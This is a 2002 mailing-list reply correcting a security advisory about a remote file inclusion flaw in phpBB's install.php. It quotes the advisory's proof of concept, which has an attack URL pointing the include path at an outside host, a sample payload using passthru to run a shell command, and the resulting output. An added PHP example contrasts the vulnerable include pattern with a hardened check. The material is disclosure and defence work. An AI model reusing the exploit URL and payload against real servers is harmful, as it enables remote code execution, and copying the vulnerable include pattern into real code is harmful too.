Note... The suggested fix for this in the PHP code below is very incorrect and will in fact leave install.php even more wide open than it currently is...

The correct fix to the PHP code should be to change the line on or about line 28 which reads

    include($phpbb_root_dir . 'includes/functions_selects.'.$phpEx);

to read more properly

    include($phpbb_root_path . 'includes/functions_selects.'.$phpEx);

Thanks,
Jonathan L. Haase

On Sunday 16 June 2002 8:29 am, morris Chang wrote:
> JCC Security Advisory
> June 16, 2002
>
> Malicious PHP source injection in phpBB
>
> Description
>
> phpBB is one of the most popular PHP bulletin board systems.
> When allow_url_fopen = On and register_globals = On in
> php.ini, phpBB has a vulnerability because install.php contains
> dangerous code, so an attacker can include any file into the
> server's PHP code.
>
> Impact
>
> It was tested on phpBB 2.0.1, but I think all of phpBB 2 is
> affected.
>
> Workaround
>
> allow_url_fopen = Off and register_globals = Off,
> and if the install is complete, remove or rename install.php.
> Or in install.php
> -------install.php------------
> define('IN_PHPBB', true);
> $phpbb_root_path='./';
> ----------------------------
> put this:
> -------snip-----------------
> $phpbb_root_dir='./';
> ----------------------------
>
> It is a good idea to add this code:
> <<PHP_CODE
> ini_set("register_globals", "Off");
> ini_set ("allow_url_fopen", "Off");
> PHP_CODE
>
> Tested systems
>
> phpBB 2.0.1 Debian GNU/Linux SID(x86)
>
> Background
>
> We checked the vulnerability with
> "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE" and
> made a sample file, functions_selects.php,
>
> --------------------includes/functions_selects.php--------------
> <? passthru("uname -a"); ?>
> -----------------------------------------
>
> and typed the following URL to invoke this sample code.
>
> TEST URL :
> "http://URL/install.php?phpbb_root_dir=http://MYBOX/"
>
> -------output----------------------------
> Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
>
> Warning: Cannot add header information - headers already sent
> by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
> on line 182
>
> Warning: Cannot add header information - headers already sent
> by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
> on line 183
>
> Warning: Cannot add header information - headers already sent
> by (output started at
> http://210.117.152.118:6969/includes/functions_selects.php:1)
> in /home/morris/public_html/tmp/phpBB2/install.php on line 346
> -----------------------------------------
>
> Thanks to BlackKnight at r0ar
> ---
> http://jcc.hackerslab.org (at morris Chang)
>
> e-mail : morris@xsdeny.net
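The include pattern the two messages above are arguing about, as an added example (this is neither phpBB's own code nor the advisory's sample): the quoted install.php line builds an include path from $phpbb_root_dir, a variable the script never assigns, so with register_globals=On its value is whatever the request supplied, and with allow_url_fopen=On include() fetches a "http://..." prefix from the attacker's host. The hardened variant beside it uses the locally assigned root and refuses anything that does not resolve to a directory inside the installation. The helper names emulate_register_globals(), vulnerable_include_target() and safe_include_target(), the request array, and the candidate paths are all constructed for this illustration; register_globals is emulated with an explicit copy so the snippet runs under any php.ini.

```php
<?php
// Added example, not phpBB code and not the advisory's sample file.
// register_globals=On is emulated here: in PHP 4 with that setting every
// request parameter becomes a global variable before the script runs.
function emulate_register_globals(array $request)
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

$phpEx = 'php';
$phpbb_root_path = './';   // assigned by install.php itself, so a request cannot override it

// The pattern from the quoted install.php line 28: $phpbb_root_dir is never
// assigned by the script, so the request-supplied value becomes the include
// prefix. With allow_url_fopen=On, include() will fetch a remote prefix.
function vulnerable_include_target($phpEx)
{
    global $phpbb_root_dir;
    return $phpbb_root_dir . 'includes/functions_selects.' . $phpEx;
}

// Hardened: resolve the root relative to the installation directory and accept
// it only if it is an existing directory at or below that directory. realpath()
// returns false for nonexistent paths (a "http://..." prefix never exists on
// disk), and the separator-terminated prefix check stops "../" escapes.
function safe_include_target($root, $phpEx, $installDir)
{
    $base = realpath($installDir);
    $real = realpath($installDir . DIRECTORY_SEPARATOR . $root);
    if ($base === false || $real === false
        || strncmp($real . DIRECTORY_SEPARATOR,
                   $base . DIRECTORY_SEPARATOR,
                   strlen($base) + 1) !== 0) {
        throw new RuntimeException('refusing include root ' . var_export($root, true));
    }
    return $real . DIRECTORY_SEPARATOR . 'includes' . DIRECTORY_SEPARATOR
         . 'functions_selects.' . $phpEx;
}

// Constructed request, modelled on the advisory's TEST URL
// (install.php?phpbb_root_dir=http://MYBOX/).
emulate_register_globals(array('phpbb_root_dir' => 'http://MYBOX/'));

echo 'vulnerable: ' . vulnerable_include_target($phpEx) . "\n";

// The locally assigned root passes; the remote prefix and a traversal are refused.
foreach (array($phpbb_root_path, 'http://MYBOX/', '../../etc/') as $candidate) {
    try {
        echo 'hardened:   ' . safe_include_target($candidate, $phpEx, __DIR__) . "\n";
    } catch (RuntimeException $e) {
        echo 'hardened:   ' . $e->getMessage() . "\n";
    }
}
```

Run it from the directory that plays the role of the phpBB root; the vulnerable function echoes the remote include target that the advisory's output shows being executed, while the hardened function only ever returns a path under that directory. The containment check is a defence in depth on top of the fix Jonathan describes (using the script-assigned $phpbb_root_path), not a replacement for it: an include prefix that the request can set at all is the underlying problem.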